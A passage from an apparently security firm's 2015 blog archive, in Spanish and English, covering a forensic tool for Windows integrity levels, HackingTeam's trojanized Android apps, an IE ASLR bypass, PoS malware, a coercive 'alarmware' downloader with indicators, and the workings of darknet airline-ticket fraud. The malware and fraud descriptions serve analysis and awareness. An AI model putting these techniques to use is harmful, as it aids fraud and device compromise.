cambiados a menos que se sepa qué se está haciendo. Es posible que se necesiten permisos de administrador para conseguir que efectivamente se establezcan. El programa permite establecer diferentes niveles de integridad Para propósitos forenses, toda la "sesión" o información sobre los niveles de integridad se pueden guardar como un fichero XML. Más tarde es posible restablecerlos con la misma herramienta. Una vez se han restablecido, no se ven los iconos y no se pueden establecer nuevos valores, puesto que en la herramienta no se está viendo el disco "en vivo". Es posible cargar sesiones anteriores y comprobar el valor de los niveles de integridad de otro disco Esto aplica igualmente a las ramas del registro, en su pestaña correspondiente del programa. MicEnum está inspirada en AccessEnum, una herramienta clásica de Sysinternals que enumera los permisos NTFS y ayuda a detectar anomalías. MicEnum puede ser descargada desde https://www.elevenpaths.com/es/labstools/micenum-2/index.html Sergio de los Santos ssantos@11paths.com @ssantosv
9 de julio de 2015
Studying the trojan apps for Android used in Hacking Team leak
Between the information leaked these days about #HackingTeam, several trojan Android APK files have been found. A first approach with Tacyt shows interesting relations with legitimate apps, the ones leaked a few days ago, some leaked last year... and some other notable stuff. We have studied some details of the leaked APKs. They were not public until this recent attack, and they were not detected by many antivirus engines until the leak. It is not the first time that we know about this company's APKs. During 2014 summer, some remote control Android apps were known to belong to this HackingTeam, and they were used to spy mobile devices. A certificate for binaries in an APK. waste and a mistake To digitally sign an executable file in Windows, an Authenticode certificate is necessary. It may be expensive, between 200 and 500 euros a year, depending on the CA that issues them. To sign an APK, Android doesn't require anything. It may be "self signed" and, therefore, free. And that is the way most of developers work. In fact, from our database, less than 100 APKs (0,002% approximately) use certificates signed by a CA. The APKs from HackingTeam were signed by this certificate that allows signing executable files as well. The three views of the Authenticode certificate used to sign the APKs And the problem is not only the waste, but the exposition. These certificates were already known since early 2013, when the tools used by HackingTeam to spy remotely were discovered. So, these APKs have been signed after that, in March. We already knew, by then, that they have been used to sign malicious code (at least, since February 2013, as this link states). An unnecessary mistake from HackingTeam. The certificate expires in November 2015. As a side note, in the executable files (in the APK, it does not make any sense) it's revoked and is not countersigned. That means that, even if it wasn't revoked, it would stop working in November 2015. Binary file signed with the same certificate What apps they were pretending to be A quick search by the packageName allows us to know what apps were trying to be simulated and contained the trojan. These are some of them that we found. Some examples of legitimate apps used as a decoy for the trojans All of them may be downloaded right now from aptoide or Google Play (although in the latest you may find the earliest versions). The topics are different. From the Quran to spy cameras. Legitimate apps used to create the malware Obviously they differ from the good ones in several aspects. Comparing the legitimate and the trojanized app Much more permissions are needed and a Google Map link is always in the code. We guess they locate victims this way. All the HackingTeam apps keep a Google Maps link in them We insist: these apps shown in their markets are innocuous, it's just that HackingTeam uses them as trojans (in the more classic meaning of the word) to encourage or disguise the malware installation. More notable facts Both in this leak and previous analyses made to HackingTeam programs (like the one on 2014 summer, where some trojanized APKs were discovered as well), we can see some that could have allowed the early detection of these trojans (aside from using the same certificate). For example, all the APKs share a singularity: between their /assets/, they keep binary files named with a single letter. HackingTeam Android malware contains this kind of files, with these singular names Searching by this kind of file or some of these hashes, we found no other sample containing them in our databases. Some of the files shared by HackingTeam samples are a singularity for them Finally, all the APKs in this leak (except one) were created "2013-04-09" roughly at 11:40, local timezone from the computer they were compiled in. 6 apps were created March, 9th, except one Sergio de los Santos ssantos@11paths.com @ssantosv Adolfo Hernández adolfo.hernandez@11paths.com
9 de julio de 2015
New Tool: MicEnum, Mandatory Integrity Control Enumerator
In the context of the Microsoft Windows family of operating systems, Mandatory Integrity Control (MIC) is a core security feature introduced in Windows Vista and implemented in subsequent lines of Windows operating systems. It adds Integrity Levels(IL)-based isolation to running processes and objects. The IL represents the level of trustworthiness of an object, and it may be set to files, folders, etc. Believe it or not, there is no graphical interface for dealing with MIC in Windows. MicEnum has been created to solve this, and as a tool for forensics. MicEnum is a simple graphical tool that: Enumerates the Integrity Levels of the objects (files and folders) in the hard disks. Enumerates the Integrity Levels in the registry. Helps to detect anomalies in them by spotting different integrity levels. Allows to store and restore this information in an XML file so it may be used for forensic purposes. Allows to set or modify the integrity levels graphically. MicEnum scanning a folder How does the tool work? The only way by now, to show or set Integrity Levels in Windows is by using icacls.exe, a command line tool. There is no easy or standard way to detect changes or anomalies. As in NTFS, an attacker may have changed Integrity Levels of a file in a system to elevate privileges or leverage another attack, so, watching this kind of movements and anomalies is important for forensics or preventive actions. The tool represents files and folders in a tree style. The integrity level of files and folders is shown in a column next to them. By scanning a folder, the tool will check all Integrity Levels and, if any of them does not match with its parent, it will expand it. If you have expanded some folders and want to group back the ones that are known to be the same, just use the checkbox at the bottom. It will hide the folders that are supposed to share same integrity level. MicEnum scanning a Windows registry branch For setting new integrity levels, just use the contextual menu again and set the desired level. Do not change them if you do not know what you are doing. You may need administrator privileges to achieve the change. The program allows to set different integrity levels For forensic purposes, the whole "session" or information about the integrity levels may be saved as an XML file. Later you may restore it with this same tool. Once restored, icons are missing, and there is no chance to set new values, of course, since you are not using your "live" hard disk. If a session is loaded, the different values are shown This all applies to registry branches as well, in its correspondent tab. MicEnum is inspired in AccessEnum, a classical tool by Sysinternals that enumerates NTFS permissions and helps detecting anomalies. MicEnum may be downloaded from: https://www.elevenpaths.com/labstools/micenum/index.html Sergio de los Santos ssantos@11paths.com @ssantosv
9 de julio de 2015
Pequeño análisis de los troyanos Android encontrados en el leak de HackingTeam
Entre la información filtrada estos días sobre #HackingTeam, se han encontrado varios ficheros APK usados para troyanizar Android. Un primer análisis en Tacyt ya muestra algunas relaciones interesantes entre aplicaciones legítimas, las filtradas esta vez, otras ya filtradas el año pasado... y otras curiosidades. Hemos analizado algunas curiosidades de los APK recopilados en el leak. No habían salido a la luz hasta ahora, y no eran cazados por muchos antivirus hasta el momento mismo de la filtración . No es la primera vez que se conocen APKs de esta "empresa". En el verano de 2014, ya se habló de apps de control remoto para Android, atribuidas a HackingTeam, y que se usaban para espiar dispositivos móviles. Un certificado para binarios en un APK. Un derroche y un despiste Para firmar un ejecutable, es necesario un certificado Authenticode. Su precio puede ser elevado. Podemos hablar de entre 200 y 500 euros al año, dependiendo de la CA que los emita. Para firmar un APK, Android no exige nada. Puede ser "autogenerado" y "autofirmado" y por tanto a coste cero. Y así lo hacen la inmensa mayoría de los programadores. De hecho, de entre nuestra base de datos menos de 100 (aproximadamente un 0,002%) utilizan certificados firmados por una CA. Los APK de HackingTeam estaban firmados por este certificado que también permite la firma de ejecutables. Las tres vistas del certificado Authenticode usado para firmar los APKs Y el problema no es solo el derroche, sino la exposición. Estos certificados ya se conocían desde principios de 2013, cuando se destaparon las herramientas que usaba HackingTeam para espiar de forma remota. Por tanto estos APK han sido firmados posteriormente, en marzo, mucho después de que ya se supiera y fuera público que habían sido usados para firmar código malicioso (como mínimo en febrero de 2013, como indica este enlace). Un despiste innecesario por parte de HackingTeam. El certificado caduca en noviembre de 2015. Como dato aparte, en los ejecutables (en los APK, no tiene sentido) además de revocado explícitamente, no está contrafirmado, con lo que aunque no se hubiera revocado, dejarían de funcionar en noviembre de este año. Fichero binario firmado con el mismo certificado Qué apps se simulaban Una rápida búsqueda del packageName de la app nos muestra qué aplicaciones se intentaban simular y contenían el troyano. Estas son algunas de las que hemos encontrado. Algunos ejemplos de apps legítimas usadas como reclamo en los troyanos Todas se pueden descarga actualmente en aptoide o Google Play (aunque en este último se encuentran versiones más modernas). La temática es variada. Desde el Corán hasta cámaras espía. Apps legítimas en las que se han "inspirado" para crear el malware Obviamente se diferencian de las legítimas en muchos aspectos. Comparativa entre la app legítima y la troyanizada Necesitan muchos más permisos, y como curiosidad, en las troyanizadas siempre existe un enlace a Google Maps, suponemos que para algún asunto de localización o posicionamiento de las víctimas. Todas las apps de HackingTeam mantienen un enlace a Google Maps Insistimos en que estas apps en los markets mostradas son inocuas, solo que HackingTeam las usa como troyanos (en el sentido más clásico de la palabra) para incitar o disimular la instalación del malware. Otras curiosidades Tanto en este leak como en otros análisis hechos al trabajo de HackingTeam (como el del año anterior donde se descubrieron ficheros APK también troyanizados), podemos ver algo más que curioso y que podía haber permitido la detección temprana de estos troyanos (aparte del uso del certificado). Por ejemplo, todos los APK mantienen una singularidad: entre sus /assets/ contienen ficheros binarios cuyo nombre consiste en una simple letra. El malware para Android de HackingTeam suele contener este tipo de ficheros con estos nombres concretos Buscando por ese tipo de fichero o algunos de esos hashes, no encontramos en nuestra base de datos ningún otro APK que los contenga explícitamente. Algunos de esos ficheros comunes en HackingTeam, resultan en una singularidad Por último, señalar también que todas las APK de esta tanda (excepto una) fueron creadas el "2013-04-09" alrededor de las 11:40 de la mañana, hora local del sistema donde se compilaron. 6 apps fueron creadas el nueve de marzo, excepto una Sergio de los Santos ssantos@11paths.com @ssantosv Adolfo Hernández adolfo.hernandez@11paths.com
7 de julio de 2015
El día que Microsoft cerró muchas puertas... pero abrió un ventanal
El problema presentado en la REcon de mediados de junio, es grave. Y la respuesta de Microsoft, más aún. Lo descubierto por Brian Gorenc, AbdulAziz Hariri, y Simon Zuckerbraun, a efectos prácticos, invalida el ASLR de Windows de 32 bits. Brian Gorenc, AbdulAziz Hariri y Simon Zuckerbraun no son unos desconocidos en el exploiting. Trabajan para la Zero Day Initiative, de HP. En febrero ya se ganaron 125.000 dólares (que donaron) por sus investigaciones sobre la Isolated Heap y la función de MemoryProtection. En ese momento no dieron detalles, pero desde entonces han pasado ya 120 días y no todo se ha arreglado, así que han publicado un documento con todos los detalles. ¿Qué es MemoryProtection y la Isolated Heap? Microsoft a veces publica no solo parches, sino que (sin decir nada) en ocasiones introduce mejoras en los boletines. El pasado verano, los boletines MS14-035 y MS14-037 vinieron con dos nuevos sistemas de mitigación de explotación para Internet Explorer. Uno contemplaba la creación de un heap separado para procesar el DOM de las páginas. Esto dificulta mucho la explotación (que se termine ejecutando código) de las vulnerabilidades. El otro introducía MemoryProtection. Se trata de una mejora a la hora de liberar la memoria del heap, que pretendía reducir el riesgo de que las vulnerabilidades provocadas por "use after free" de punteros puedan ser explotadas más fácilmente. Y así fue. Se redujeron el número de fallos explotables por estas causas. Gracias a estas dos estrategias, se cerraron muchas puertas (posibilidades de que muchos tipos de vulnerabilidades pasadas y futuras basadas en el mismo fallo fueran explotables). Nada es inviolable y, a pesar de estos sistemas de mitigación, en febrero de 2015, en FireEye ya detectaron exploits "in the wild" que conseguían eludir estas mitigaciones. Incluso los propios Gorenc, AbdulAziz Hariri y Simon Zuckerbraun han mostrado cómo conseguirlo con todo lujo de detalles en este mismo estudio. Google llegó a una conclusión parecida a principios de enero... . Pero eso no es lo más importante. Bien por Microsoft y sus estrategias para mejorar la seguridad en Internet Explorer desde la raíz... o no. Se abrió el ventanal El problema es que los investigadores no solo han conseguido eludirlas sino que, ayudándose de la implementación de estas mitigaciones, pueden eludir ASLR en Windows de 32 bits. Ciertas funcionalidades de estas mitigaciones les permiten deducir las direcciones base en memoria de ciertas DLL, con lo que, a efectos prácticos, permite a un exploit eludir ASLR puesto que solo necesitará conocer estas direcciones para situarse y lanzar de forma cómoda su shellcode o exploit correspondiente. Aquí un vídeo que lo muestra. En resumen, han abierto un ventanal... y no piensan cerrarlo. Pero ojo, esto solo ocurre de forma fiable en las versiones de 32 bits de Internet Explorer 10 y posteriores. Y esta ha sido la "excusa" para no arreglarlo. Microsoft ha respondido que las versiones de 64 bits se benefician más y mejor del ASLR (más combinaciones posibles) y que por tanto, los usuarios de sistemas de 32 bits, no tienen tanta protección. Esto es obvio, pero no por ello hay que deducir que, si su protección es menor, ¿qué más da que sea eludible del todo? Error. Parece que Microsoft antepone el interés de reducir un subconjunto de tipos de vulnerabilidades UAF, al de una protección tan importante (y más genérica) como es el ASLR. En cierto modo tiene sentido: no quieren invertir recursos en arquitecturas obsoletas, necesitan deshacerse de la tecnología de 32 bits en cuanto les sea posible. Y este tipo de problemas, les "ayuda". ¿Es grave o no? ¿Me afecta? Los atacantes ya saben eludir ASLR en Internet Explorer. Lo suelen hacer a través de plugins instalados u otras técnicas más o menos elaboradas. Por tanto, esto es otra herramienta más en su kit de explotación. Por otro lado, solo afecta a las versiones de 32 bits del sistema operativo Windows 7 y 8, que es donde se lanza el Internet Explorer de 32 bits nativo. De estos quedan pocos, aunque los hay. Hay estudios de 2012 que hablan de que solo el 10% de los Windows son Windows 7 de 32 bits. Ante esto, si no se cambia de arquitectura, solo queda dejar de usar Internet Explorer o configurarlo con EMET. Pero ojo, no está de más recordar algo interesante sobre Internet Explorer y reforzarlo en este aspecto. Curiosamente, Internet Explorer 10 funciona en Windows de 64 bits como proceso de 64 bits... pero también como procesos de 32 bits (sus pestañas). Esto no hace que sea vulnerable al fallo descubierto por la gente de HP, pero no está de más recordarlo y subir su seguridad (si se puede). IE 10 sobre Windows 8 de 64 bits por defecto. Proceso padre con nivel de integridad medio y 64 bits. Pestaña con nivel de integridad bajo y 32 bits. 64 vs 32 bits En Windows de 64 bits, hay dos Internet Explorer instalados. Uno en "Program files" y otro en "Program Files (x86)". El primero es Internet Explorer nativo en 64 bits, y el segundo en 32 bits. Aunque se lance el de 32, el sistema operativo lo sustituirá rápidamente por el de 64 (aunque mantiene las pestañas de 32). Este es más seguro por varias razones: IE de 32 bits solo puede correr plugins y ActiveX que sean de 32 bits. Los creadores de malware quieren acaparar al mayor número de víctimas, y por tanto programan en 32 bits porque es cómodo, y compatible con lo antiguo y lo moderno. Los exploits para IE de 64 bits son más complejos de crear. Las mitigaciones contra la creación de exploits en un entorno de 32 bits son más sencillas de eludir en 32 bits (y esto es justo lo que ha ocurrido). Pero esto no se le suele decir al usuario. Estéticamente, son idénticos. Hasta Internet Explorer 10, si se abre el navegador de 32 bits, todo es 32 bits, y si se abre el de 64, todo es 64 bits. Pero a partir de Internet Explorer 10, la cosa cambia. En esta versión, el proceso "broker" que corre en el modo de integridad medio, es siempre un proceso de 64 bits, y los hijos (las pestañas), de 32. Así se consigue compatibilidad con los plugins. Además, al hecho de que Internet Explorer se ejecute en un nivel de integridad bajo, Microsoft lo llamó "Modo protegido". Esto está relacionado con los niveles de integridad con los que se ejecuta el navegador y sus pestañas (el proceso padre en modo normal, y las pestañas hijas normalmente en modo bajo). El modo protegido (activo por defecto) es lo que hace que los hijos se ejecuten en modo de integridad bajo (y no medio), lo que los aísla Para complicar el asunto, en Windows 8 existen dos versiones del navegador: la de "Escritorio" y la de "Interfaz moderna", esa que nadie usa pensada para los móviles y tabletas. En la interfaz moderna, todo es 64 bits y en el escritorio no. Y esto se complica aún más con Internet Explorer 11 dependiendo si se está en Windows 7, 8 u 8.1... Protección Visto este problema que permite eludir el ASLR en 32 bits, ¿es buena idea que todo Internet Explorer (y no solo su proceso padre) se ejecute en 64 bits? Sí. El problema podría venir por la compatibilidad de los plugins, pero es cuestión de elegir bien durante su instalación. Por tanto, en un Windows 64 bits de escritorio, ¿se puede obligar a que incluso las pestañas sean procesos de 64 bits? Sí. Esto se ha llamado "Modo protegido mejorado". Si el "modo protegido" está relacionado con los niveles de integridad, el "mejorado" tiene que ver además con la arquitectura. Eso sí, insistimos en que antes de habilitarlo, es necesario estar seguro de que las extensiones o plugins que se usan en el navegador son compatibles. Se puede habilitar el "Modo protegido mejorado" desde las opciones avanzadas del navegador. Activar modo protegido mejorado (solo Windows 8) En Internet Explorer 10, activando esa opción, conseguiremos este efecto: Pestañas de 64 bits, preo además.. en un AppContainer Un AppContainer es un nivel de "sandbox" (nivel obligatorio, como lo llama Process Explorer, o de integridad) pensado para las apps del market de Windows (a partir del 8), bastante restrictivo. Para rematar el lío, en Internet Explorer 11 hay que dar un paso extra. Existe además otra opción avanzada de seguridad que dice "Habilitar procesos de 64 bits para el modo protegido de Internet Explorer" Si eso no está activo en IE11, aunque el modo protegido mejorado esté activo, las pestañas seguirán siendo de de 32 bits (aunque dentro de un AppContainer). ¿Complejo? Sí. Algunas páginas no funcionarán con el modo protegido mejorado. La buena noticia es que podrás deshabilitarlo selectivamente por dominios tocando una rama del registro ( TabProcConfig). Sergio de los Santos ssantos@11paths.com @ssantosv
29 de junio de 2015
Telefónica Trend Report: The PoS Malware threat in 2015
A few weeks ago in the United Kingdom, cashless payments overtook the use of notes and coins for the first time. This is the latest demonstration that, while worldwide cash still remains king, the balance is slowly changing. We present here, a complete study about PoS malware state of art, evolution, divs, countermeasures... These are the main ideas from the report. Although the smartphone has been the catalyst for the shift towards more secure mobile payments, credit and debit card transactions at point-of-sale (PoS) still remain the main entry point of consumer data into merchants’ information environment. Perhaps an obvious point, and one certainly not missed by cyber-criminals if the "mega breaches" affecting major U.S retailers in the past few years are anything to go by. Illustration of PoS malware breach headlines, 2002- 2015 Targeting the weak link in PCI-DSS, cyber criminals have refined PoS malware, employing "RAM Scraping" techniques to parse memory processes on PoS terminals before card data is encrypted. It is now a mature cybercrime model, responsible for the majority of confirmed data breaches and feeding a booming underground marketplace. Focusing too much on the headline-grabbing breaches belies that from a frequency perspective, small and medium sized enterprises are most affected; criminals are after the money, not the headlines. However, awareness has undoubtedly risen, and the average time between breach and detection appears to be narrowing, but the number of detections in Q1 2015 outstripping the previous two years is also a narrative of soaring propagation rates. Frequency of incident classification patterns with confirmed data breaches Industries with high card transaction volumes (particularly hotels and entertainment) in addition to the more obvious retail sector, are most at risk from PoS malware. The size of the U.S economy combined with the late adoption of EMV "Chip and Pin" technology ensures it will almost certainly remain the most targeted during 2015, and an attack surge within the target rich environment is possible before the October implementation deadline. Although even when EMV is implemented, data remains that enables fraudulent e-commerce transactions. In large enterprise, the drive for innovation at PoS can see security overlooked in favour of the consumer experience and integration with other business applications. Secure technology that would hinder PoS malware such as end to end encryption is often unrealistic for small and medium sized businesses to implement. Conversely, criminals are able to call upon a readily available and proven PoS malware codebase, unthreatened by obsolescence of a PoS data environment set to remain largely Windows XP based for several years to come. Evolution of PoS malware variants Technical analysis reveals heavy development occurring across a few key codebase variants, with some strains adopting nation-state level complexity and others stripping back and removing unnecessary overhead. The overall malware campaign, in particular the exfiltration of stolen data can be complex, and is often based on detailed network knowledge. Figures in millions (pounds) of UK credit card fraud and countermeasure implementation date While it is possible that large companies may be able to limit the impact of protracted "mega breaches", the risk of smaller more distributed breaches remains, and the upwards trajectory of PoS malware in 2015 shows no signs of slowing. However rather than be overawed in the face of the threat, it should be remembered that common PoS network intrusion methods such as phishing and attackers using default passwords are often targeted but nothing new. PoSeidon Logo and a phishing email campaing used to target PoS vendors Ben Walton ben.walton@11paths.com
24 de junio de 2015
"Alarmware" en Google Play: no detiene una alarma hasta que se instala otra app maliciosa
En ElevenPaths, hemos encontrado algunas muestras de downloaders en Google Play que funcionan de una manera muy especial. Las aplicaciones esconden su icono e instalan un servicio que descargará otra aplicación de un servidor. Esto ya lo hemos visto antes... pero la parte interesante es que, para intentar que se instale la app descargada, comenzará una especie de alarma que sonará cada pocos segundos hasta que el nuevo paquete descargado de Google Play sea de verdad instalado por el usuario. Una de las apps encontradas Hemos encontrado varias muestras vivas de una nueva variante de downloader conocida como "Stew.B" que ya cubrimos hace algunos meses. Pero esta vez, funcionan de una manera muy diferente, todavía más molesta. Quizás deberíamos llamarlo "alarmware". Cómo funciona Se supone que las apps son guías de Minecraft ( un viejo truco) o Clash of Clans. Incluso recetas de pizza o consejos para perder peso. La app analizada muestra algunos anuncios y entonces simplemente elimina el icono del escritorio para que el usuario no sea capaz de lanzarla de nuevo. Sin embargo, entre bambalinas, la app instala un servicio que se lanzará a sí mismo en cada reinicio. Parte de la configuración del servicio El servicio puede responder a dos eventos, cuando la pantalla se bloquea y desbloquea y cuando una aplicación es instalada o desinstalada. El servicio dispone de una función aleatoria para calcular cuántas horas o minutos esperar desde que la primera app sea instalada, hasta la visita al servidor del atacante y recoger algunas instrucciones. Entre ellas, una URL apuntando a un paquete que será descargado y que podría ser, literalmente, cualquier cosa. El programa realiza una petición para descargar una nueva app y qué mensaje mostrar Después se lanza este APK descargado y... realmente intentará que se instale. Incluso si el teléfono no está configurado para instalar apps desde fuera de Google Play. Esquema básico de funcionamiento del programa Muchos de estos dispositivos es posible que dispongan de la medida de seguridad activada: "no instalar APKs desde fuentes no confiables" (fuera de Google Play). Así que el recién descargado programa del atacante no podrá ser instalado y una de estas pantallas aparecerá una y otra vez. APKs de fuera de Google Play no se permiten, y el teléfono puede no estar configurado para utilizar VerifyApps por defecto Y, mostrando estas pantallas una y otra vez, la experiencia de usuario será a partir de ahora bastante molesta. Usando como truco un componente "Toast" (una notificación de texto especial que aparece cuando el teléfono se conecta a una red Wi-Fi por ejemplo u otros mensajes importantes de sistema) comenzará a mostrar una y otra vez un mensaje instando a la instalación y un sonido molesto. Incluso vibrará. Si se cancela o se vuelve atrás, comenzará de nuevo (el sonido y el mensaje) tratando de convencer al usuario de que es una actualización de Google Service o algo parecido. Esto ocurrirá cada pocos segundos. Si el usuario permite la instalación de APKs fuera de Google Play, o finalmente lo configura de esta manera porque ya no puede soportar la molestia, aparecerá esta pantalla de instalación. Pantalla de instalación de la app descargada El mensaje y alerta sonora de Toast de instalación aparecerá una y otra vez. El texto mostrado estará en el idioma del navegador (porque fue tomado del servidor del atacante). La alerta sonará incluso si el dispositivo está en silencio. Será muy complicado utilizar el teléfono de forma "normal", a menos que se desinstale la app original (si es que se puede con la pantalla de petición de instalación que aparece cada pocos segundos). Será así todo el tiempo hasta desinstalar la app original descargada de Google Play o finalmente acceder a la instalación de lo descargado. Si el usuario finalmente lo instala, la alarma se detendrá y, en este caso, aparecerán "dos" programas Google Service... ¿quién se atreve a desinstalar cualquiera de ellos? Uno de los servicios de Google es falso Curiosamente, la aplicación instalada (el programa falso de Google Service) es otra vez el mismo código que la original descargada, lo que resulta extraño. Parece que el atacante estaba probando, pero esto podría cambiar en cualquier minuto. El atacante es de Rusia, y ya usó una técnica similar en marzo, que fue eliminada por Google. Algunas apps del mismo tipo ya fueron eliminadas en marzo Hace unas semanas, el atacante consiguió de nuevo subir otras apps al market. Algunas de ellas todavía están online. Estas son las que hemos encontrado gracias a Tacyt, como ya hicimos anteriormente con JSDialers, JSSMSers, Clickers, Shuabang, etc. Guide minecraft game, com.appalexk.mcs, 965559baa77650d9c6249626d33ad14c5210c272 Guide Minecraft Free, com.appalexk.aam, bde1502855e2d9912937906c1d85bec24b3b6246 Guide for Clash of Clans, com.appalexk.cofc, 30c4db4033478007a1bdc86a40e37b5cd4053633 Recipes Pizza, com.appalexk.pizza, a84197a150285f04aee1096e96374255ccf5c2aa Гайд для Earn to Die, com.appalexk.dde El APK descargado desde el servidor del atacante es (ahora mismo): a2123233d8d972b68c721c01c6ad1785d8189fb9 Sergio de los Santos ssantos@11paths.com @ssantosv Juan Manuel Tirado juanmanuel.tirado@11paths.com
12 de junio de 2015
"Alarmware" in Google Play: will not stop an alarm until you install another malicious app
In ElevenPaths, we have spotted a few samples of downloaders in Google Play that work in a very special way. The app hides its icon and installs a service that will download another application from a server. We have seen this before... but the interesting part is that, to make sure the downloaded app is installed, it will start a kind of alarm that will start every few seconds until this new package from outside Google Play is indeed installed. One of the offensive apps We have found several alive samples of a new variant of a downloader known as "Stew.B" that we covered a few months ago. But this time they work in a different way, even more annoyingly. They maybe should be called, "alarmware". How it works The apps are supposed to be Minecraft or Clash of Clans guides. Even pizza recipes or weigh loss advice. The analyzed app shows some ads and then it just removes the icon from the desktop, so the user is not able to launch it again. Although, in the background, the app installs a service that will launch itself on every reboot. Part of the configuration of the service This service is ready to respond to two events, when the screen locks and unlocks and when an app is installed or uninstalled. The service has a random function to calculate how many hours or minutes to wait since the first application has been installed until it visits again the attacker's server and gets some instructions. Between them, the URL pointing at a package to be downloaded that could be literally, anything. The program requests which new app to download and what message to show Then this fresh downloaded APK starts and... it will really try hard to be installed. Even if you do not have your phone condivd to install from outside Google Play. Basic scheme of the malware program Many of the devices will maybe have the security measure enabled: "do not install APKs from untrusted sources" (outside Google Play). So the just downloaded attacker's program will not be able to be installed and one of these screens will appear again and again. APKs from outside Google Play are not allowed, and the telephone is not condivd to use VerifyApps by default And, showing these screens again and again, the user experience with the telephone will become quite annoying. Using a trick with a toast component (a special notification text that appears when you are connected to a new Wi-Fi or any other important system message) it will start popping again and again a message and a very annoying sound. Even vibrating. If you cancel or go back, it will start again (sound and message) trying to convince you it is a Google Service update or something like that. This will happen every few seconds. If the user does allow to install APKs from outside Google Play, or it finally condivs it because he can not stand the sound anymore, this screen will appear. Just before installing the downloaded APK The installation toast message and alert will keep on appearing and beeping again and again. Even if the device is silenced. The shown text will be in the browser language (it was taken from the attacker's server). It will be very difficult to use the telephone normally anymore, unless you uninstall the original app (if you can in such a short time with the annoying screen request and sounds). It will continue annoying the user until the downloaded app is installed or the original app from Google Play uninstalled. If the user finally installs it, the alarm will stop, and there will be "two" Google Service programs... who will dare to uninstall any of them? One of the Service Google Play is fake Funny enough, the application installed (the fake Google Service program) is just again the same code as the original one, which is weird. It is supposed the attacker is testing, but this could change in any minute. This attacker is from Russia, and used a similar technique back in March, but Google removed them. Some apps of the same kind were removed back in March A few weeks ago, the attacker got to upload some other apps again. Some of them are still online. These are the ones we found thanks to Tacyt, as we have done before with JSDialers, JSSMSers, Clickers, Shuabang, etc. Guide minecraft game, com.appalexk.mcs, 965559baa77650d9c6249626d33ad14c5210c272 Guide Minecraft Free, com.appalexk.aam, bde1502855e2d9912937906c1d85bec24b3b6246 Guide for Clash of Clans, com.appalexk.cofc, 30c4db4033478007a1bdc86a40e37b5cd4053633 Recipes Pizza, com.appalexk.pizza, a84197a150285f04aee1096e96374255ccf5c2aa Гайд для Earn to Die, com.appalexk.dde The APK downloaded from the server is (right now): a2123233d8d972b68c721c01c6ad1785d8189fb9 Sergio de los Santos ssantos@11paths.com @ssantosv Juan Manuel Tirado juanmanuel.tirado@11paths.com
12 de junio de 2015
Bombardeado por subir un "selfie"
Hace algunos días, hemos vivido un nuevo caso en el que los metadatos han tomado especial relevancia. Si bien habitualmente se puede hablar de circunstancias similares, esta noticia sorprende porque las consecuencias muy diferentes. El pasado seis de junio un integrante de los yihadistas del Estado Islámico tuvo la brillante idea de realizarse un "selfie" dentro del propio centro de mando del cuartel general y subirlo posteriormente a las redes sociales jactándose de su posición y poder dentro de la organización sin percatarse que ese acto no tardaría en tener sus consecuencias. Son muchas las ocasiones en las que hemos comentado la importancia de tratar los metadatos de las imágenes que realizamos con los dispositivos móviles o cámaras fotográficas antes de distribuirlas fuera de nuestro entorno. Famoso fue el caso de John Mcafee que se encontraba desaparecido tras un turbio caso ocurrido en su casa de Belice y que tras la entrevista de un periodista que se hizo y público una foto junto a él, permitió a las autoridades que este fuese localizado en Costa Rica. El caso que nos ocupa es más especial, e incluso invita a la reflexión. Las imágenes de los dispositivos suelen incrustar el geo posicionamiento entre los metadatos que contienen. Los analistas de inteligencia de la Fuerza Aérea en Florida detectaron la información, la procesaron y extrajeron la ubicación exacta del individuo y su cuartel general a las orillas del Éufrates en la zona Siria. Recoger esta información (a través de programas como Metashield Forensics o webs como Metashield Analyzer) y colocarla en un geo localizador es trivial. La diferencia en este caso es que, después, esto derivó en una orden de ataque. Ejemplo de extracción de metadatos de una fotografía Apenas 22 horas después del hallazgo, aviones de combate de la fuerza aérea se posicionaron en la zona y lanzaron una descarga de proyectiles reduciendo el edificio a escombros. Este es un claro ejemplo de la importancia de los metadatos y su tratamiento previo en las imágenes que se suben a los repositorios web y redes sociales. La información que se proporciona dice mucho de nosotros y nuestro entorno. En el caso del yihadista posiblemente haya sido su última publicación, puesto que parece que el autodenominado Estado Islámico utilizaba frecuentemente este tipo de redes sociales para el envío de imágenes y propaganda yihadistas, buscando la captación de adeptos para su causa. Aunque lo cierto es que la duda no tarda en surgir: ¿de verdad ha sido un "despiste" (parece demasiado "obvio" entre gente entrenada en este tipo de entornos), o quizás más bien una fórmula para traspasar información a un tercero, a través de un canal abierto? Que cada cual saque sus propias conclusiones. Antonio Bordón antonio.bordon@11paths.com
9 de junio de 2015
Cómo funciona el fraude de los billetes de avión y reserva de hoteles (y II)
En la entrada anterior se introdujo el asunto y las fórmulas de fraude de los billetes de avión y reserva de hoteles. Se describió cómo funcionaba, de dónde venían las fuentes de fraude, y se ofrecieron algunas cifras. Veamos ahora otros detalles sobre el asunto, que nos permitan conocer en profundidad este tipo de estafas. Quién puede comprar Cualquiera con bitcoins y acceso a la Deep Web (y algo de valor, todo sea dicho) puede comprar a estos vendedores. La transacción suele funcionar así: El comprador envía al vendedor una captura de una agencia de viajes donde se vea el vuelo/hotel deseado, con el precio retail publicado. El vendedor crea un "custom listing" en el mercado negro por el valor acordado (que oscila entre el 20% y el 50% del precio retail). El comprador compra el anuncio y envía el dinero en bitcoins. El dinero queda depositado en una especie de depósito (escrow) en el black market, junto a los datos de los viajeros. El vendedor hace su trabajo y proporciona el localizador. El comprador verifica con la aerolínea que el billete es correcto y libera el pago del depósito. Dependiendo del vendedor, esto suele ser entre las 24 horas después de la entrega del billete hasta 24 horas antes del vuelo. Muy pocos aceptan liberar el escrow después del vuelo. ¿Cuánto cuesta? Los precios son variables, y están directamente relacionados con el precio retail encontrado en el mundo real. Por ejemplo, si un vuelo cuesta 1.000€ y la tarifa del vendedor es del 25%, se pagan 250€ en bitcoins. Los vendedores con métodos de compra basados en carding o uso de cuentas de puntos robadas, cobran entre el 20% y el 35%, dependiendo de su experiencia, referencias etc. Los vendedores con métodos más sofisticados y seguros, cobran entre el 40% y el 50%, ofreciendo según ellos métodos absolutamente seguros e indetectables que nunca supondrán un problema para los viajeros. ¿Los viajeros usan su identidad real? En general, está bastante extendida en la Deep Web la creencia de que viajar de esta forma es seguro. La inmensa mayoría suele disponer siempre de una coartada, como denegación plausible. Por ejemplo, es fácil alegar que tú como viajero eres inocente y que has sido víctima de una estafa, que creías que estabas comprando un billete legal a alguien que conociste y decía trabajar en una agencia de viajes y poder conseguir billetes más baratos. Aunque, en caso de ser descubiertos, muchos podrían alegar ser víctimas de otra estafa, difícilmente podrían justificar portar documentación falsa. Si bien 